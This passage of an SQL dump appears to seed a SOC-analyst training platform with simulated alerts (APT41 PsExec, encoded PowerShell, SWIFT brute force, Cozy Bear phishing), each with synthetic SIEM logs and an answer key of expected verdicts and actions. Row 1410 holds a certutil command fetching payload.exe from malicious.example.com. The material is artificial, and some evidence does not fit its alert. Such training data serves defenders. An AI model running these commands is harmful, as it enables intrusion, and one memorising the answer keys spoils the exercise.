3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1406, 'False Positive: Unusual SSH Login Pattern', 'medium', 'Azure Defender', 'An unusual SSH login pattern was detected, but further investigation confirmed it was due to a scheduled maintenance task.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:22:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.7.55\",\"dst_ip\":\"10.0.4.25\",\"username\":\"maintainer\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"ssh maintainer@10.0.4.25\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ssh maintainer@10.0.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled maintenance task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The SSH login was due to scheduled maintenance, not unauthorized access.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:22:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.7.55\\\",\\\"dst_ip\\\":\\\"10.0.4.25\\\",\\\"username\\\":\\\"maintainer\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"ssh maintainer@10.0.4.25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1407, 'APT41 Lateral Movement Detected via PsExec', 'critical', 'KAPE', 'Lateral movement detected using PsExec from an internal IP to multiple hosts. This activity correlates with known APT41 techniques.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T03:15:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"192.168.1.107\",\"username\":\"finance_admin\",\"hostname\":\"finance-server02\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PsExec usage is commonly associated with lateral movement attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity matches APT41\'s known lateral movement using PsExec. Immediate action required to isolate affected systems.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.947Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T03:15:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"192.168.1.107\\\",\\\"username\\\":\\\"finance_admin\\\",\\\"hostname\\\":\\\"finance-server02\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.107 -u finance_admin -p ***** cmd /c dir\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1408, 'Suspicious PowerShell Activity with Encoded Commands', 'high', 'Velociraptor', 'An encoded PowerShell command was executed, potentially indicating a fileless malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T05:47:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.110\",\"username\":\"john.doe\",\"hostname\":\"workstation-jdoe\",\"command_line\":\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.110\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with suspicious PowerShell execution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are a common tactic for fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell execution is indicative of a potential fileless malware attack, requiring immediate isolation and further forensic analysis.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.948Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T05:47:35Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.110\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"workstation-jdoe\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGgAbwBBAHAAIAAtAGMAbwBtAG0AYQBuAGQAIABpAGQAZQBuAHQAaQB0AHkA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1409, 'Detected SWIFT Network Attack Attempt', 'critical', 'FTK', 'Unauthorized login attempts detected on the SWIFT network indicating a potential breach attempt.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T02:22:11Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"swift_admin\",\"hostname\":\"swift-gateway\",\"failed_attempts\":35}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP, potential target of unauthorized access attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts from a known malicious IP suggest a brute force attack targeting the SWIFT network.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:54:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:53:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:52:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-02T13:51:06.950Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T02:22:11Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"swift_admin\\\",\\\"hostname\\\":\\\"swift-gateway\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1410, 'Malicious LOLBin Activity Detected Using Certutil', 'high', 'Volatility', 'Certutil was used in a suspicious manner to download a potentially malicious file.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"username\":\"malware_user\",\"hostname\":\"compromised-pc\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious command\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known malicious URL hosting malware payloads\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download and execute malicious payload\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was used to download a known malicious payload, indicating potential compromise via LOLBin techniques.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"malware_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1411, 'Cozy Bear Phishing Campaign Detected', 'high', 'Proofpoint', 'A spear-phishing email with a malicious attachment was detected, resembling tactics used by Cozy Bear.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:12:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.1.100\",\"username\":\"jane.smith\",\"hostname\":\"email-server\",\"email_sender\":\"cozybear@example.com\",\"domain\":\"example.com\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"cozybear@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Email address linked to known phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious attachment\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious attachment and sender details consistent with Cozy Bear phishing tactics. Immediate action is required to prevent compromise.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Cozy Bear Phishing Campaign Detected\",\"date\":\"2026-03-02T13:55:06.952Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1412, 'APT29 Zero-Day Exploit Detected in SWIFT Environment', 'critical', 'Splunk', 'Anomalies indicating a zero-day exploit were detected in the SWIFT transaction servers, likely linked to APT29.', 'Zero-Day', 'T1214', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:05:37Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.10\",\"username\":\"swift_operator\",\"hostname\":\"swift-server01\",\"domain\":\"finance.local\"}', '2026-03-02 03:13:33', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially compromised via zero-day exploit\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"finance.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal domain for SWIFT operations\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"zero_day_exploit\",\"analysis_notes\":\"The network activity suggests exploitation using a zero-day vulnerability, consistent with APT29 tactics. Immediate containment is necessary.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.953Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 